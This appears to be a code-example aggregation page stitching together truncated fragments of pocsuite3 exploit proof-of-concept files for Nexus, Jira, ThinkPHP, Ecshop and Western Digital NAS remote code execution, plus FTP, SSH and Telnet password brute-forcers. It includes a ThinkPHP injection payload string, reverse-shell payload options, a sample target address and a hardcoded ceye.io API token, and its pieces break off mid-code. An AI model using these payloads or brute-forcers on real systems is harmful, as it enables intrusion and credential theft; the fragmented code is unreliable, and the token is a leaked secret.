How to use the pocsuite3.api.VUL_TYPE function in pocsuite3


# shadowsock5/Poc/Nexus/Nexus_CVE_2018_16621.py
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE

'''
CVE-2018-16621: Nexus 3 EL injection
Admin access is required
'''
class Nexus3_2018_16621_EL_INJECTION_POC(POCBase):
    vulID = 'Nexus3-CVE-2018-16621'
    appName = 'Nexus3'
    appVersion = 'Nexus Repository Manager OSS/Pro <=3.13.0'
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.CODE_EXECUTION
    vulDate = '2018-10-18'  # date the vulnerability was disclosed; use today's date if unknown
    author = 'shadowsock5'  # PoC author
    createDate = '2020-04-03'  # date the PoC was written
    updateDate = '2020-04-07'  # date the PoC was last updated; defaults to the creation date
    references = ['https://support.sonatype.com/hc/en-us/articles/360010789153-CVE-2018-16621-Nexus-Repository-Manager-Java-Injection-October-17-2018']  # source of the vulnerability details; leave empty for a 0day
    name = 'Nexus3 EL injection'  # PoC name
    install_requires = []  # third-party module dependencies; avoid them where possible, see the "PoC third-party module dependency" guide when needed
    cvss = u"中危"  # NOTE: a Chinese severity label ("medium"), not a numeric CVSS score

    
    # Translated: "use a random string as the banner; compute the number, then return".
    # Two random operands and their product. ran_sum is presumably the value the
    # injected expression must evaluate to in the response — confirm in _verify.
    # Being class attributes, they are drawn once at class-definition time and
    # shared by every instance. `random` is not imported in the lines shown; it
    # must come from elsewhere in the file.
    ran1 = random.randint(1,100)

    ran2 = random.randint(100,200)
    
    ran_sum = ran1 * ran2
# shadowsock5/Poc/Nexus/Nexus_poc.py
output.success(result)
        else:
            output.fail()
        return output


'''
CVE-2019-5475/CVE-2019-15588
需要管理员权限
'''
class Nexus2_RCE_POC(POCBase):
    vulID = 'Nexus2-CVE-2019-5475_15588'
    appName = 'Nexus2'
    appVersion = 'Nexus Repository Manager OSS/Pro <= 2.14.13'
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.CODE_EXECUTION
    vulDate = '2019-09-09'  # date the vulnerability was disclosed; use today's date if unknown
    author = 'shadowsock5'  # PoC author
    createDate = '2019-09-13'  # date the PoC was written
    updateDate = '2020-02-17'  # date the PoC was last updated; defaults to the creation date
    references = ['https://hackerone.com/reports/654888']  # source of the vulnerability details; leave empty for a 0day
    name = 'Nexus2 RCE'  # PoC name
    appPowerLink = ['https://support.sonatype.com/hc/en-us']  # vendor homepage
    desc = '''
        Nexus Repository Manager 2 RCE
    '''  # short description of the vulnerability
    install_requires = []  # third-party module dependencies; avoid them where possible, see the "PoC third-party module dependency" guide when needed
    cvss = u"中危"  # NOTE: a Chinese severity label ("medium"), not a numeric CVSS score

    
    # Translated: "use a random string as the banner and confirm command execution through the ceye API".
    # Out-of-band DNS callback domain, hardcoded. It is tied to one ceye.io account, so
    # NOTE(review): this belongs in configuration rather than source; anyone running the
    # PoC unchanged reports results to that account.
    DOMAIN = 'wvg689.ceye.io'
# knownsec/pocsuite3/pocsuite3/pocs/ftp_burst.py
from pocsuite3.lib.core.threads import run_threads


class DemoPOC(POCBase):
    vulID = '62522'  # seebug SSV id (matches the reference below)
    version = '3'
    author = ['seebug']
    vulDate = '2013-11-21'
    createDate = '2013-11-21'
    updateDate = '2013-11-21'
    references = ['http://sebug.net/vuldb/ssvid-62522']
    name = 'FTP 弱密码'  # "FTP weak password"
    appPowerLink = ''
    appName = 'ftp'
    appVersion = 'All'
    vulType = VUL_TYPE.WEAK_PASSWORD
    desc = '''ftp 存在弱密码,导致攻击者可连接进行文件管理进行恶意操作'''  # "weak FTP credentials let an attacker connect and manage files"
    samples = ['']  # NOTE: a list holding one empty string, not an empty list
    category = POC_CATEGORY.TOOLS.CRACK
    protocol = POC_CATEGORY.PROTOCOL.FTP

    def _verify(self):
        result = {}
        host = self.getg_option("rhost")
        port = self.getg_option("rport") or 21

        ftp_burst(host, port)
        if not result_queue.empty():
            username, password = result_queue.get()
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Username'] = username
# knownsec/pocsuite3/pocsuite3/pocs/ecshop_rce.py
from pocsuite3.lib.utils import get_middle_text


class DemoPOC(POCBase):
    vulID = '97343'  # seebug SSV id (matches the reference below)
    version = '3.0'
    author = ['seebug']
    vulDate = '2018-06-14'
    createDate = '2018-06-14'
    updateDate = '2018-06-14'
    references = ['https://www.seebug.org/vuldb/ssvid-97343']
    name = 'Ecshop 2.x/3.x Remote Code Execution'
    appPowerLink = ''
    appName = 'ECSHOP'
    appVersion = '2.x,3.x'
    vulType = VUL_TYPE.CODE_EXECUTION
    # Translated: "Ecshop disclosed SQL injection and arbitrary code execution across all versions; affected: Ecshop 2.x and 3.x-3.6.0".
    desc = '''近日,Ecshop爆出全版本SQL注入及任意代码执行漏洞,受影响的版本有:Ecshop 2.x,Ecshop 3.x-3.6.0'''
    samples = []
    install_requires = ['']  # NOTE: one empty-string entry; an empty list is the usual way to declare no dependencies
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    protocol = POC_CATEGORY.PROTOCOL.HTTP
    # Translated: "in attack mode the `command` option sets the command to run; `app_version` selects the Ecshop version".
    pocDesc = '''在攻击模式下,可以通过command参数来指定任意命令,app_version用于选定ecshop版本'''

    def _options(self):
        o = OrderedDict()
        o["command"] = OptString("whoami", description='攻击时自定义命令')
        o["app_version"] = OptItems(['2.x', '3.x', 'Auto'], selected="Auto", description='目标版本,可自动匹配')
        payload = {
            "nc": REVERSE_PAYLOAD.NC,
            "bash": REVERSE_PAYLOAD.BASH,
        }
        o["payload"] = OptDict(default=payload, selected="bash")
# knownsec/pocsuite3/pocsuite3/pocs/thinkphp_rce2.py
from pocsuite3.lib.utils import random_str, generate_shellcode_list


class DemoPOC(POCBase):
    vulID = '97767'  # ssvid
    version = '1.0'
    author = ['chenghs']
    vulDate = '2019-1-11'  # NOTE: month and day are not zero-padded; the ISO 'YYYY-MM-DD' form is used by the other PoCs
    createDate = '2019-1-11'
    updateDate = '2019-1-11'
    references = ['https://www.seebug.org/vuldb/ssvid-97765']  # NOTE(review): ssvid 97765 here vs vulID '97767' above — confirm which is intended
    name = 'Thinkphp 5.0.x 远程代码执行漏洞'  # "ThinkPHP 5.0.x remote code execution vulnerability"
    appPowerLink = 'http://www.thinkphp.cn/'
    appName = 'thinkphp'
    appVersion = 'thinkphp5.0.23'
    vulType = VUL_TYPE.CODE_EXECUTION
    # Translated (abridged): the framework's core Request class lets the request method be
    # overridden via $_POST['_method'] without strict validation, so Request properties can
    # be overwritten and, combined with framework behaviour, arbitrary functions called.
    desc = '''Thinphp团队在实现框架中的核心类Requests的method方法实现了表单请求类型伪装,默认为$_POST[‘_method’]变量,却没有对$_POST[‘_method’]属性进行严格校验,可以通过变量覆盖掉Requets类的属性并结合框架特性实现对任意函数的调用达到任意代码执行的效果。'''
    samples = []
    category = POC_CATEGORY.EXPLOITS.WEBAPP

    def _check(self, url):
        flag = 'PHP Extension Build'
        data = "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1"

        payloads = [
            r"/index.php?s=captcha"
        ]
        for payload in payloads:
            vul_url = url + payload
            headers = {
                "Content-Type": "application/x-www-form-urlencoded"
            }
# knownsec/pocsuite3/pocsuite3/pocs/wd_nas_login_bypass_rce.py
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY


class DemoPOC(POCBase):
    vulID = '97550'  # seebug SSV id (matches the reference below)
    version = '3'
    author = ['seebug']
    vulDate = '2018-09-25'
    createDate = '2018-09-25'
    updateDate = '2018-09-25'
    references = ['https://www.seebug.org/vuldb/ssvid-97550']
    name = 'Western Digital My Cloud(NAS)登录绕过导致无限制远程命令执行'  # "WD My Cloud (NAS) login bypass leading to unrestricted remote command execution"
    appPowerLink = 'https://www.wdc.com/en-us/'
    appName = 'WD NAS 登陆绕过导致无限远程命令执行'  # NOTE: holds the vulnerability title rather than the product name
    appVersion = ''
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''
        Western Digital My Cloud(NAS)登录绕过导致无限制远程命令执行
    '''  # same title as `name`
    samples = ['96.234.71.117:80']  # sample target in host:port form
    category = POC_CATEGORY.EXPLOITS.REMOTE

    def _options(self):
        """Declare the user-settable options for this PoC.

        Returns an OrderedDict with one entry, ``command``: an OptDict whose
        choices are the payload templates from REVERSE_PAYLOAD (``nc`` and
        ``bash``), with ``bash`` preselected.
        """
        reverse_payloads = {
            "nc": REVERSE_PAYLOAD.NC,
            "bash": REVERSE_PAYLOAD.BASH,
        }
        options = OrderedDict()
        options["command"] = OptDict(default=reverse_payloads, selected="bash")
        return options

    def _verify(self):
# shadowsock5/Poc/Jira/Jira_poc.py
7.4.x
    7.5.x
    7.6.x < 7.6.14
    7.7.x
    7.8.x
    7.9.x
    7.10.x
    7.11.x
    7.12.x
    7.13.x < 7.13.5
    8.0.x < 8.0.3
    8.1.x < 8.1.2
    8.2.x < 8.2.3
    '''
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.CODE_EXECUTION
    vulDate = '2019-07-10'  # date the vulnerability was disclosed; use today's date if unknown
    author = 'shadowsock5'  # PoC author
    createDate = '2020-02-17'  # date the PoC was written
    updateDate = '2020-02-17'  # date the PoC was last updated; defaults to the creation date
    references = ['https://mp.weixin.qq.com/s/d2yvSyRZXpZrPcAkMqArsw']  # source of the vulnerability details; leave empty for a 0day
    name = 'Jira未授权服务端模板注入'  # "Jira unauthenticated server-side template injection"
    install_requires = []  # third-party module dependencies; avoid them where possible, see the "PoC third-party module dependency" guide when needed
    cvss = u"中危"  # NOTE: a Chinese severity label ("medium"), not a numeric CVSS score

    
    # Translated: "use a random string as the banner and confirm command execution through the ceye API".
    # Out-of-band detection settings. As class attributes, BANNER and CEYE_URL are computed
    # once when the class is defined and shared by every instance.
    DOMAIN = 'wvg689.ceye.io'
    # NOTE(review): an API token for the ceye.io service committed in source. It should be
    # loaded from configuration or the environment and the committed value rotated.
    TOKEN = '76dce59a986eab595838f7dc74903035'
    # Six random ASCII letters; `random` and `ascii_letters` are not imported in the lines shown.
    BANNER = ''.join([random.choice(ascii_letters) for i in range(6)])
    # Query URL for ceye's DNS record log, filtered to lookups containing BANNER. Note the
    # plain-http scheme: the token is sent in the clear on every query.
    CEYE_URL = 'http://api.ceye.io/v1/records?token={0}&type=dns&filter={1}'.format(TOKEN, BANNER)
# shadowsock5/Poc/Nexus/CVE-2020-11753.py
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE

'''
CVE-2020-11753: Nexus 3 groovy injection(Improper Access Controls)
Admin access is required
This feature was removed in 3.22.0
'''
class Nexus3_2020_11753_groovy_INJECTION_POC(POCBase):
    vulID = 'Nexus3-groovy-injection'  # NOTE: the CVE number from the module docstring (CVE-2020-11753) is not part of this id
    appName = 'Nexus3'
    appVersion = 'Nexus Repository Manager OSS/Pro <=3.21.2(官方说是3.21.1 and 3.22.0)'  # parenthetical: "the vendor says 3.21.1 and 3.22.0"
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.CODE_EXECUTION
    vulDate = '2020-04-16'  # date the vulnerability was disclosed; use today's date if unknown
    author = 'shadowsock5'  # PoC author
    createDate = '2020-04-03'  # date the PoC was written. NOTE(review): precedes vulDate (2020-04-16) — likely carried over from another PoC; confirm
    updateDate = '2020-04-17'  # date the PoC was last updated; defaults to the creation date
    references = ['https://support.sonatype.com/hc/en-us/articles/360046233714-CVE-2020-11753-Nexus-Repository-Manager-3-Improper-Access-Controls-2020-04-16']  # source of the vulnerability details; leave empty for a 0day
    name = 'Nexus3 groovy injection'  # PoC name
    install_requires = []  # third-party module dependencies; avoid them where possible, see the "PoC third-party module dependency" guide when needed
    cvss = u"高危"  # NOTE: a Chinese severity label ("high"), not a numeric CVSS score



    def _verify(self):
        result={}

        vul_url = self.url
# knownsec/pocsuite3/pocsuite3/pocs/ssh_burst.py
from pocsuite3.lib.core.threads import run_threads


class DemoPOC(POCBase):
    vulID = '89688'  # seebug SSV id (matches the reference below)
    version = '3'
    author = ['seebug']
    vulDate = '2018-09-18'
    createDate = '2018-09-18'
    updateDate = '2018-09-18'
    references = ['https://www.seebug.org/vuldb/ssvid-89688']
    name = 'SSH 弱密码'  # "SSH weak password"
    appPowerLink = ''
    appName = 'ssh'
    appVersion = 'All'
    vulType = VUL_TYPE.WEAK_PASSWORD
    desc = '''ssh 存在弱密码,导致攻击者可连接主机进行恶意操作'''  # "weak SSH credentials let an attacker log in to the host"
    samples = ['']  # NOTE: a list holding one empty string, not an empty list
    install_requires = ['paramiko']  # third-party SSH client library this PoC depends on
    category = POC_CATEGORY.TOOLS.CRACK
    protocol = POC_CATEGORY.PROTOCOL.SSH

    def _verify(self):
        result = {}
        host = self.getg_option("rhost")
        port = self.getg_option("rport") or 22

        task_queue = queue.Queue()
        result_queue = queue.Queue()
        ssh_burst(host, port, task_queue, result_queue)
        if not result_queue.empty():
            username, password = result_queue.get()
# knownsec/pocsuite3/pocsuite3/pocs/telnet_burst.py
from pocsuite3.lib.core.threads import run_threads


class DemoPOC(POCBase):
    vulID = '89687'  # seebug SSV id (matches the reference below)
    version = '3'
    author = ['seebug']
    vulDate = '2018-09-19'
    createDate = '2018-09-19'
    updateDate = '2018-09-19'
    references = ['https://www.seebug.org/vuldb/ssvid-89687']
    name = 'Telnet 弱密码'  # "Telnet weak password"
    appPowerLink = ''
    appName = 'telnet'
    appVersion = 'All'
    vulType = VUL_TYPE.WEAK_PASSWORD
    desc = '''telnet 存在弱密码,导致攻击者可登录主机进行恶意操作'''  # "weak Telnet credentials let an attacker log in to the host"
    samples = ['']  # NOTE: a list holding one empty string, not an empty list
    category = POC_CATEGORY.TOOLS.CRACK
    protocol = POC_CATEGORY.PROTOCOL.TELENT  # NOTE: 'TELENT' is presumably the member's spelling in pocsuite3's POC_CATEGORY.PROTOCOL — confirm against the enum before "correcting" it

    def _verify(self):
        result = {}
        host = self.getg_option("rhost")
        port = self.getg_option("rport") or 23

        telnet_burst(host, port)
        if not result_queue.empty():
            username, password = result_queue.get()
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Username'] = username